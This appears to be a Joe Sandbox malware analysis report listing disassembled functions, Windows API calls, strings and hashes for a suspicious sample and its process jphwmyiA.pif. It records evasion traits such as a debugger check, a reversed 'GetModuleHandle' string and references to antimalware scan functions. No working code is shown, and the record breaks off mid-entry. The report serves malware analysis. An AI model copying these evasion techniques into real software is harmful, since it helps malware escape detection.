Opcode ID: 89b40da7c756f10fc8df537a05cf145a1ab4b17f22d82c14c44d4816c4735f0b
Instruction ID: e86ba738bc30e9c15890537d12e90c54a4d2eef0ff2bb903f779067339c0bfac
Opcode Fuzzy Hash: 89b40da7c756f10fc8df537a05cf145a1ab4b17f22d82c14c44d4816c4735f0b
Instruction Fuzzy Hash: DF018675A44308BFEB16EFA4DC42E9E77EEFBCDB10F524865F900D7650DA30A9008A14

Function 0293A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0293AA67,?,?,00000000), ref: 0293A9E8

Part of subcall function 0293A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A762

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0293AA67,?,?,00000000), ref: 0293AA18
EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0293AA23
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0293AA67,?,?,00000000), ref: 0293AA41
EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0293AA4C

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 260384db92f80e271823c377884d1393926cbb30cfeefc769507e88b6c6e538b
Instruction ID: b19e53ca7836ba4177e7b639750e142a1daa95d7b9c68a917a7833e040ed8d9e
Opcode Fuzzy Hash: 260384db92f80e271823c377884d1393926cbb30cfeefc769507e88b6c6e538b
Instruction Fuzzy Hash: 6F01D6326402487FF703E7B8CD16F6E739EDBC6724F910160F651E6AD0D6649E008A69

Function 0293AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0293AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0293AAAF

Part of subcall function 0293A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A762

Strings

ggg, xrefs: 0293AB95
eeee, xrefs: 0293ABBE
yyyy, xrefs: 0293ABA5

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: e1703552e33e5e5b13f7867f7bae8d8b9d277741a92b4800688f164c820c32ed
Instruction ID: 83f171e24ca56c690592003aaae4d1995132387881bb34b55024a3244d7e583e
Opcode Fuzzy Hash: e1703552e33e5e5b13f7867f7bae8d8b9d277741a92b4800688f164c820c32ed
Instruction Fuzzy Hash: 7041C1717082094BDB13EB6988846BFB3FBEBC5300B555969E4E2C7344EA78DD058A25

Function 02948018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Strings

KernelBASE, xrefs: 02948051
AeldnaHeludoMteG, xrefs: 02948031

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 0f173c4dde9f3867c18c18fea440964ead44727beea5d544e3bacd8b3e3e51b6
Instruction ID: 25415d0f63aa5ea38032384969e9d422802b23846c348069fdf23832aa67fa70
Opcode Fuzzy Hash: 0f173c4dde9f3867c18c18fea440964ead44727beea5d544e3bacd8b3e3e51b6
Instruction Fuzzy Hash: BBF09031A54308BFE701EFA8DC52DAE77EDFB89B507924A20F800D3600EB30BD009A65

Function 0294EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,0294F3CC,UacInitialize,0299237C,0295B40C,UacScan,0299237C,0295B40C,ScanBuffer,0299237C,0295B40C,OpenSession,0299237C,0295B40C,ScanString), ref: 0294EFCE
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EFE0

Strings

IsDebuggerPresent, xrefs: 0294EFDA
KernelBase, xrefs: 0294EFC9

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 741b53cc3d18c5284810c650a900fca623e0161bf36574067dba9ebf5e8a1be8
Instruction ID: 8cdb864ea2c78c9d70f4030abb2a124350f175e742f8bc005ed5393a69cf63a0
Opcode Fuzzy Hash: 741b53cc3d18c5284810c650a900fca623e0161bf36574067dba9ebf5e8a1be8
Instruction Fuzzy Hash: C9D012623557602DB50137F41CC4C1E024C95C556D7601F71B062D50D2ED6788511114

Function 0293C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0295D10B,00000000,0295D11E), ref: 0293C3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0293C40B

Strings

GetDiskFreeSpaceExA, xrefs: 0293C405
kernel32.dll, xrefs: 0293C3F5

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 5ac0743d58aa5d0492ead2f5e3da54c507e23c2af0710dcd00a9608fe207dd4c
Instruction ID: 87d3ca27c32e7eff60d70778c35eb369bf7d6886315c307fac74c126c4d7cbc1
Opcode Fuzzy Hash: 5ac0743d58aa5d0492ead2f5e3da54c507e23c2af0710dcd00a9608fe207dd4c
Instruction Fuzzy Hash: D7D0A7A1F44B105EF7036FB1688963636CC9384369F009836E14975101D77744148F54

Function 0293E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E2AA
VariantClear.OLEAUT32(?), ref: 0293E2D3

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 6c7fefa005a4513f3ddf9d8bb9f97120834b761c290aeae46fd7291fc8236b61
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 3E41E875A016299BCB66DB98CC90BD9B7FDAF89714F0041E5E649E7211DA30AF808F60

Function 0293ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293ACFD
GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADAE

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 00e71b508f4eb88894122818281381be35992d3a9a2aac92b7ba657a37b3425d
Instruction ID: e6c568499885c01be94263b5f79d898dc12dc72b9bdd9090d44ed9ab38e934fd
Opcode Fuzzy Hash: 00e71b508f4eb88894122818281381be35992d3a9a2aac92b7ba657a37b3425d
Instruction Fuzzy Hash: 38412A70A402589BDB22EB68CC84BDAB7FDAB48301F0440E9E588E7341DB759F888F55

Function 0293ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293ACFD
GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADAE

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 1d78dc676988d00b3bf56e9e322051f2cdc5ba4e12b1d28c73828e2c08723fa4
Instruction ID: d78da0dd35217b5b643781d1658a9ba2bc405a96ede891f1963167fd1a00e03d
Opcode Fuzzy Hash: 1d78dc676988d00b3bf56e9e322051f2cdc5ba4e12b1d28c73828e2c08723fa4
Instruction Fuzzy Hash: E4414B70A40258ABDB22EB68CC84BDAB7FDAB48301F0400E5E588E7341DB749F888F55

Function 02931C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52fc1f55e744587a219031f4e5c5699c454c3aaaa868e236c689b6e5879fc9c4
Instruction ID: 306bc89fb462cbc4d58999ab1c99378d1d0f7787046297796609a1409d8f165f
Opcode Fuzzy Hash: 52fc1f55e744587a219031f4e5c5699c454c3aaaa868e236c689b6e5879fc9c4
Instruction Fuzzy Hash: 8DA1F8677106000BE71AAA7C9C843BDB7C6DFC5325F2C827EE11DCB3A5EB64C9568650

Function 0293946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0293955A), ref: 029394F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0293955A), ref: 029394F8

Strings

yyyy, xrefs: 029394CD

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: a6fd78254aa907a9f43a9be7464a1b8d40454de97cd6517413259b82aeca5111
Instruction ID: 6e8c990b16af981fd2d86311c5147904b3037b7b739a804fe809b9b82ad218bc
Opcode Fuzzy Hash: a6fd78254aa907a9f43a9be7464a1b8d40454de97cd6517413259b82aeca5111
Instruction Fuzzy Hash: CF213076A042189FEB12DFA8C881BAEB3F9EF49710F5140A5ED45E7240D774DE40CBA5

Function 02948184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0294820E), ref: 029481F0

Strings

Kernel32, xrefs: 029481CF
FlushInstructionCache, xrefs: 0294819D

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: fc925ebf782101d98f0c8f48ee6bf25e6239f52b9a78aa1a5bbba57a7b9b8321
Instruction ID: b6b2c7edb1fecb653b04b3b87c7452e1c6074db0bf2d21a5f7874303ccb46730
Opcode Fuzzy Hash: fc925ebf782101d98f0c8f48ee6bf25e6239f52b9a78aa1a5bbba57a7b9b8321
Instruction Fuzzy Hash: 50016D75A44704BFEB11EFA8DC42F5A77EDF78DB60F524860F904D3650DA34AD109A60

Function 02936444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0293644D
TlsGetValue.KERNEL32(00000020), ref: 02936462

Strings

h)x, xrefs: 02936467

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AllocValue
String ID: h)x
API String ID: 1189806713-2736596335
Opcode ID: d4c6be5cd24b4b3b26e9195e51aef2bebdc8b217563f6261e291efe28e41d81a
Instruction ID: 7cb0acf6de2fadca130599ec3a5618a8d57b5b0db426f60c2d29c0434c185699
Opcode Fuzzy Hash: d4c6be5cd24b4b3b26e9195e51aef2bebdc8b217563f6261e291efe28e41d81a
Instruction Fuzzy Hash: BCC08CB0E48329AAEB02BBB5900862936ADEB81351F008C20B508C7108DB36C0109F1D

Function 0294AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AD90
IsBadWritePtr.KERNEL32(?,00000004), ref: 0294ADC0
IsBadReadPtr.KERNEL32(?,00000008), ref: 0294ADDF
IsBadReadPtr.KERNEL32(?,00000004), ref: 0294ADEB

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction ID: 1541cafd071463d2c83ed5abe04d0cd50a20f59e18496f380e101472353fe428
Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction Fuzzy Hash: 5C21B1B1680619ABDB10DF29CC80FAE73B9EF84365F008111EE5097380EF34ED119AA4

Analysis Process: jphwmyiA.pifPID: 340, Parent PID: 6800COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	67.7%
Signature Coverage:	12.7%
Total number of Nodes:	637
Total number of Limit Nodes:	58

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

*, xrefs: 004020E1
[, xrefs: 00401B37
', xrefs: 00402006
W, xrefs: 00401B23
!, xrefs: 0040201A
x, xrefs: 00402088
:, xrefs: 00401B28
{, xrefs: 0040211D
D, xrefs: 00401DFB
%, xrefs: 004020FA
5, xrefs: 00402109
v, xrefs: 0040206A
x, xrefs: 00401B78
6, xrefs: 004020C5
!, xrefs: 00401B1E
!, xrefs: 004020CF
v, xrefs: 00401E4B
0, xrefs: 00401BBD
o, xrefs: 00401B8D
W, xrefs: 00402033
), xrefs: 0040202E
x, xrefs: 00401E69
*, xrefs: 00401A1F
E, xrefs: 00401E0F
{, xrefs: 00401B4B
W, xrefs: 004020E6
h, xrefs: 00401A6F
., xrefs: 00401B0A
v, xrefs: 0040212C
{, xrefs: 00401E3C
v, xrefs: 00401B5A
[, xrefs: 00402047
{, xrefs: 0040205B
4, xrefs: 00401B64
o, xrefs: 00402159
W, xrefs: 00401B14
8, xrefs: 00401BA9
___, xrefs: 0040227D
4, xrefs: 00402074
U, xrefs: 004020F5
_._, xrefs: 00402257
x, xrefs: 0040214A
", xrefs: 00401B0F
V, xrefs: 00402038
', xrefs: 00401AF6
o, xrefs: 00402097
., xrefs: 0040201F
V, xrefs: 00401E19
4, xrefs: 00402136

Memory Dump Source

Source File: 00000003.00000002.4109204899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4109204899.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4109204899.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 2932A630 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 2932A8D8

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: HandleModule
String ID: )
API String ID: 4139908857-2427484129
Opcode ID: 0d9d17d3357afb8ef79b6bb465ffa80c70e3439a9b1cbf85b6ada9fc30a846d6
Instruction ID: d169f513470bcd5a351132f9571bc8b46ef9195158c446cc2250f265d207ff26
Opcode Fuzzy Hash: 0d9d17d3357afb8ef79b6bb465ffa80c70e3439a9b1cbf85b6ada9fc30a846d6
Instruction Fuzzy Hash: C1D15474E007499FDB08DF69C480A9EBBF2EF88310B10856AD44AEB355DB34ED46CB94

Function 27925860 Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

Hbq, xrefs: 27925C32
(o^q, xrefs: 27925D66

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: d46d3c2f955782a82c1c1c5f080d01b22822f5efec5bd43db0574e22187fce64
Instruction ID: 3c587504b49c4d290ff0df90b2b4198c773554357e1f507d6b21f574a6e338b6
Opcode Fuzzy Hash: d46d3c2f955782a82c1c1c5f080d01b22822f5efec5bd43db0574e22187fce64
Instruction Fuzzy Hash: 5CF16D70A006299FCB08DF69C894AAEBBF6BF88704F248599E505DB395EF34DD41CB50

Function 2792B1DF Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

PH^q, xrefs: 2792B446
PH^q, xrefs: 2792B457

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: d6dd87ee8aa35f723cd3746e03efd918cb28919fa5cb9ffd2026329fea59e955
Instruction ID: 9e8b9181e85c4f3b47a214fe44c153282792fa02c12fdc6eec8c4a43ac7b43c4
